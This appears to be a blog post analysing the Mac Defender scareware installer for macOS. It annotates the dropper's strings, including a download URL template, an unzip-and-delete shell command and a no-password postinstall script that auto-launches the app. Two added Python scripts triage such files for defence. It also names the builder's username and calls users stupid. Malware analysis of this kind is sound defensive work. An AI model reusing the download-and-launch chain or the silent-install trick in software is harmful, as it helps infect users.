000000000000a801 __ZZL14getConfigParamiE8__func__
000000000000a822  stub helpers
000000000000a830 dyld__mach_header
000000000000a842 __ZZ45-[DownloadWinCtrl download:didFailWithError:]E12s_nFailedCnt
000000000000a885 .objc_class_name_DownloadWinCtrl
000000000000a8a6 .objc_class_name_InstallerAppDelegate
000000000000a8cc _NXArgc
000000000000a8d4 _NXArgv
000000000000a8dc ___progname
000000000000a8e8 __mh_execute_header
000000000000a8fc _environ
000000000000a905 start
000000000000a90b .objc_class_name_NSBundle
000000000000a925 .objc_class_name_NSFileManager
000000000000a944 .objc_class_name_NSObject
000000000000a95e .objc_class_name_NSString
000000000000a978 .objc_class_name_NSTimer
000000000000a991 .objc_class_name_NSURL
000000000000a9a8 .objc_class_name_NSURLDownload
000000000000a9c7 .objc_class_name_NSURLRequest
000000000000a9e5 .objc_class_name_NSWindowController
000000000000aa09 .objc_class_name_NSWorkspace
000000000000aa26 _CGWindowLevelForKey
000000000000aa3b _NSApp
000000000000aa42 _NSApplicationMain
000000000000aa55 _NSLog
000000000000aa5c __ZdaPv
000000000000aa64 __Znam
000000000000aa6b ___CFConstantStringClassReference
000000000000aa8d ___assert_rtn
000000000000aa9b _exit
000000000000aaa1 _fclose
000000000000aaa9 _fopen
000000000000aab0 _fread
000000000000aab7 _fseek
000000000000aabe _memset
000000000000aac6 _objc_msgSend
000000000000aad4 _objc_msgSend_fpret
000000000000aae8 _strlen
000000000000aaf0 _system$UNIX2003
000000000000ab01 dyld_stub_binder

Here's some of the good stuff.

0000000000001a58 /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
0000000000001ac0 /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
0000000000001b30 /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
0000000000001b90 /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit

He's using standard libraries.

0000000000002676 startDownloadingURL:
000000000000268b URLWithString:
000000000000269a requestWithURL:cachePolicy:timeoutInterval:

That's NSURLDownload. We're going online. We're going to get more weapons of destruction.

000000000000271f removeItemAtPath:error:

Together with bundlePath and the static function deleteAndExit (mangled as __ZL13deleteAndExitv further down) that's a cleanup routine: once it's done, it removes its own bundle and exits.

0000000000002767 launchApplication:

That's NSWorkspace. He's launching what he downloaded.

00000000000027df setLevel:
00000000000027e9 orderFront:
00000000000027f5 center

He puts his window high in the Z-order (see CGWindowLevelForKey in the imports) and front and centre.

000000000000286f /Users/pga/SVN-Home/Projects/MAC/FAV/Src/Installer/DownloadWinCtrl.mm

Ah, a bit of a blooper. This path is the __FILE__ that assert() bakes in (note ___assert_rtn among the imports and the 'nParam > -1 && nParam < 4' expression right after it), so the asserts weren't compiled out: this is not a release build. It also hands you the username of the hacker who built it: pga.

00000000000028e2 http://%@/mac/soft.php?affid=%@

And here's the URL template it will fetch from. The host and the affiliate ID aren't in the binary: the two %@ slots are filled in at run time from a config file the app reads itself (getConfigParam, which the assert says takes a parameter index of 0 to 3, plus pathForResource:ofType:, fopen/fread and componentsSeparatedByString: are all here). Presumably they've hacked into a number of sites and set up platform-specific directories under /mac/.

0000000000002902 app.zip

That'll be the very descriptive name of the actual file to download.

000000000000290a /Applications/%@.%@

That's where it's supposed to go: /Applications again, with the name and extension filled in at run time.

0000000000002922 cd /Applications;unzip %@;rm -rf __MACOSX

That's how the download is unarchived. The string is a format for system() (see _system in the imports) so it runs through /bin/sh; the rm -rf __MACOSX just cleans up the resource-fork folder unzip leaves behind.

All that's needed now is the actual site it will access.
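The walk through the strings above is a repeatable procedure: look for the download, the shell-out, the self-delete, the window-level tricks, and the things that leak (a __FILE__ path, a URL with %@ slots that tells you the host lives in a config file, not the binary). Here it is as a script. This is an added example, not the page's or the malware author's code; the sample input is constructed from the Xstrings output printed above with the offsets dropped, and the rules and their wording are ours. For a real binary feed it the output of `strings -a`.

```python
"""Triage a strings dump for the behaviours picked out above.

Added example, not from the page or from whoever wrote mcshdr. The sample
below is constructed from the Xstrings output printed above (offsets
dropped); feed the real thing the output of `strings -a` on the binary.
"""
import re

SAMPLE_STRINGS = """\
/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
startDownloadingURL:
requestWithURL:cachePolicy:timeoutInterval:
removeItemAtPath:error:
bundlePath
launchApplication:
setLevel:
orderFront:
/Users/pga/SVN-Home/Projects/MAC/FAV/Src/Installer/DownloadWinCtrl.mm
nParam > -1 && nParam < 4
http://%@/mac/soft.php?affid=%@
app.zip
/Applications/%@.%@
cd /Applications;unzip %@;rm -rf __MACOSX
__ZL13deleteAndExitv
_OBJC_CLASS_$_NSURLDownload
___assert_rtn
_system$UNIX2003
"""

# A rule fires only when every needle is a substring of some line.
INDICATORS = {
    "download":       ("fetches a second stage with NSURLDownload",
                       ("startDownloadingURL:", "NSURLDownload")),
    "shell_exec":     ("hands a format string to system(), i.e. /bin/sh",
                       ("_system", "unzip %@")),
    "self_delete":    ("removes its own bundle and exits",
                       ("removeItemAtPath:error:", "bundlePath", "deleteAndExit")),
    "launch_payload": ("launches whatever it unpacked",
                       ("launchApplication:",)),
    "window_level":   ("raises its window above everything else",
                       ("setLevel:", "orderFront:")),
    "debug_asserts":  ("assert() compiled in, so __FILE__ paths leak",
                       ("___assert_rtn",)),
}

# A build path left in by assert(): the first component after /Users/ is the developer's login.
SOURCE_PATH = re.compile(r"^/Users/(?P<user>[^/]+)/.*\.(?:m|mm|c|cpp|h)$")
URL = re.compile(r"^https?://\S+$")


def triage(strings_text):
    lines = [ln.strip() for ln in strings_text.splitlines() if ln.strip()]

    hits = {}
    for name, (meaning, needles) in INDICATORS.items():
        if all(any(n in ln for ln in lines) for n in needles):
            hits[name] = {"meaning": meaning,
                          "strings": [ln for ln in lines if any(n in ln for n in needles)]}

    urls = [ln for ln in lines if URL.match(ln)]
    return {
        "hits": hits,
        "urls": urls,
        # %@ slots mean the host and ID are filled in at run time, not stored in the binary
        "runtime_filled_urls": [u for u in urls if "%@" in u],
        "shell_commands": [ln for ln in lines if ";" in ln and ("unzip" in ln or "rm " in ln)],
        "dev_usernames": sorted({m.group("user") for m in map(SOURCE_PATH.match, lines) if m}),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_STRINGS)
    for name, hit in report["hits"].items():
        print(f"{name:15} {hit['meaning']}")
    print("urls:", report["urls"])
    print("shell:", report["shell_commands"])
    print("dev usernames:", report["dev_usernames"])
```

The rules are deliberately conjunctive: setLevel: on its own is in every second Cocoa app, and removeItemAtPath:error: is harmless until it sits next to bundlePath and a function called deleteAndExit. It's the combination that tells you what the thing is for.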

Searching for that source code path at Google turns up two hits. Both on Twitter.



The second tweet is actually good advice. The Mac Defender authors are either... or... or...

Two Copies

The download actually has two identical copies of the same mcshdr.app: one in Contents/Archive.pax.gz and one in Contents/Resources/mcshdr.pax.gz. Obviously only one needs to run.

mcshdr.info

mcshdr.info tells us mostly what we already know. Most important again is it doesn't need authorisation and it doesn't want you to choose another location. (And why will be obvious in the next section.)

Title Setup program
Version 2.4
Description
DefaultLocation /Applications
DeleteWarning

### Package Flags

NeedsAuthorization NO
Required NO
Relocatable NO
RequiresReboot NO
UseUserMask NO
OverwritePermissions NO
AllowBackRev NO
RootVolumeOnly NO
OnlyUpdateInstalledLanguages NO

postinstall, mcshdr.post_install

They're identical. And they're not taking any chances. They want to run the app as soon as it's in place. This is as good a reason as any to not let the user choose a different install location - so the script works.

#! /bin/sh

# need for auto start
open /Applications/mcshdr.app

And it's Apple's own Installer.app that runs it, no password asked; open(1) then launches mcshdr.app in the logged-in user's session.

At which point you'll be toast.
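Everything the 'Inside' section read by hand - the authorisation flag, the pinned install location, the scripts in Contents/Resources and the 'open' they run - is exactly what you want to check before any package gets double-clicked. Here is that check as a script. This is an added example, not Rixstep's code and not the malware's: build_sample_pkg writes a skeleton of mcshdr.pkg carrying the Info.plist keys and the postinstall script quoted above (the archives themselves are left out), and triage_pkg reads the same things back. Point triage_pkg at a real bundle-style .pkg directory to use it for real; the flat .xar format Installer also accepts is outside its scope.

```python
"""Triage a bundle-style .pkg the way the sections above walk through it.

Added example, not Rixstep's or the malware's code. build_sample_pkg writes
a skeleton of mcshdr.pkg with the Info.plist keys and the postinstall
script quoted above (the archives are left out); triage_pkg then reads the
flags and scripts that decide what happens without a password.
"""
import datetime
import os
import plistlib
import re
import tempfile

SAMPLE_INFO_PLIST = {   # values copied from the Info.plist printed above
    "CFBundleIdentifier": "net.abv",
    "CFBundleName": "Install program",
    "CFBundleShortVersionString": "2.4",
    "IFPkgBuildDate": datetime.datetime(2011, 6, 10, 11, 54, 1),
    "IFPkgFlagAuthorizationAction": "NoAuthorization",
    "IFPkgFlagDefaultLocation": "/Applications",
    "IFPkgFlagRelocatable": False,
    "IFPkgFlagRestartAction": "NoRestart",
}
SAMPLE_POSTINSTALL = "#! /bin/sh\n\n# need for auto start\nopen /Applications/mcshdr.app\n"

# Script names Installer picks up from Contents/Resources; mcshdr.pkg ships
# both the generic 'postinstall' and the per-package '<name>.post_install'.
SCRIPT_NAME = re.compile(r"^(?:pre|post)(?:install|flight|upgrade)$|\.(?:pre|post)_install$")
OPEN_CALL = re.compile(r"^\s*open\s+(\S+)", re.M)


def build_sample_pkg(root):
    """Write the skeleton package under root and return its path."""
    pkg = os.path.join(root, "mcshdr.pkg")
    resources = os.path.join(pkg, "Contents", "Resources")
    os.makedirs(resources)
    with open(os.path.join(pkg, "Contents", "Info.plist"), "wb") as f:
        plistlib.dump(SAMPLE_INFO_PLIST, f)
    for name in ("postinstall", "mcshdr.post_install"):
        with open(os.path.join(resources, name), "w") as f:
            f.write(SAMPLE_POSTINSTALL)
    return pkg


def triage_pkg(pkg):
    """Report the flags and scripts that matter before anyone double-clicks."""
    contents = os.path.join(pkg, "Contents")
    with open(os.path.join(contents, "Info.plist"), "rb") as f:
        info = plistlib.load(f)
    # A missing key means no authorisation, same as the explicit value.
    auth = info.get("IFPkgFlagAuthorizationAction", "NoAuthorization")
    report = {
        "identifier": info.get("CFBundleIdentifier"),
        "version": info.get("CFBundleShortVersionString"),
        "needs_authorization": auth != "NoAuthorization",
        "default_location": info.get("IFPkgFlagDefaultLocation"),
        "relocatable": bool(info.get("IFPkgFlagRelocatable", True)),
        "scripts": {},
        "warnings": [],
    }
    resources = os.path.join(contents, "Resources")
    names = sorted(os.listdir(resources)) if os.path.isdir(resources) else []
    for name in names:
        if not SCRIPT_NAME.search(name):
            continue
        with open(os.path.join(resources, name), errors="replace") as f:
            body = f.read()
        launches = OPEN_CALL.findall(body)
        report["scripts"][name] = {"launches": launches, "lines": len(body.splitlines())}
        for target in launches:
            report["warnings"].append(f"{name} runs 'open {target}' the moment the files are in place")
    if not report["needs_authorization"]:
        report["warnings"].append("no password prompt: Installer never asks before running the scripts")
    if report["default_location"] and not report["relocatable"]:
        report["warnings"].append(f"pinned to {report['default_location']} so the scripts can count on that path")
    return report


def demo():
    """Build the sample package in a scratch directory and triage it."""
    with tempfile.TemporaryDirectory() as root:
        return triage_pkg(build_sample_pkg(root))


if __name__ == "__main__":
    for line in demo()["warnings"]:
        print("!", line)
```

Run against mcshdr.pkg this gives four warnings: two scripts that 'open' the app, no password prompt, and an install location the user can't change. None of those is malicious on its own; together they are the whole trick.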

To Recapitulate

As recounted elsewhere, the Mac Defender attack is a well thought out attack that may have taken months to get together. The first step was to compromise websites of eejits, hack their FTP accounts, and upload booby-trapped files to their servers.

Then followed the poisoning of Google Images results, which led people to click on links to the sites they'd hijacked.

And then finally they uploaded Mac Defender so people would get hit by it. And the purpose of Mac Defender is to scare you into thinking you're infected so you pull out your credit card.

Then the hackers run away with your credit card info and buy mink coats and chinchilla coats or whatever they want.

But staying clear of Mac Defender is really easy and doesn't require any AV software.

  • Don't ever open anything you didn't want to download.
  • Turn off JavaScript when accessing any Google Images site.
  • Make sure Safari's 'Open "safe" files after downloading' is off.
  • Use something like Tracker to open and test run all new software. Yes it's our product. But no one else has one and frankly it's indispensable and frankly you need it.

So What Does This All Mean?

So what does this all mean?

There's nothing wrong with your computer. And there's nothing wrong with your operating system. The main attack vector isn't you anyway - it's the eejits who let their websites be compromised and it's Google who aren't blocking the bad sites fast enough.

The only attack vector locally on your own machine is your stupidity. And nothing helps against stupidity.

Virus signature lists SUCK. They're useless. They're 'after the fact'. They only worked in the 'old days' (very old days) long ago when virus writers were doing this for a lark and never followed up. But today things are deadly serious and there's a lot of dollars/rubles involved. Virus writers just check their iterations with the latest lists until they figure out a way to get through - all you get for your money is a false sense of security.

Virus signature lists SUCK. Just read that again.

See Also
ACP: Test Drive Xfile
ACP: Tracker: Why Chance It?
ACP: Xstrings: Of Needles and Haystacks

The Technological: Apple Customer Support
Rixstep Coldspots: Statement on the MacGuard Exploit
Rixstep Industry Watch: More on Mac Defender/MacGuard
The Technological: Playing 'Mac-A-Mole' with Apple Computers

Copyright © Rixstep. All rights reserved.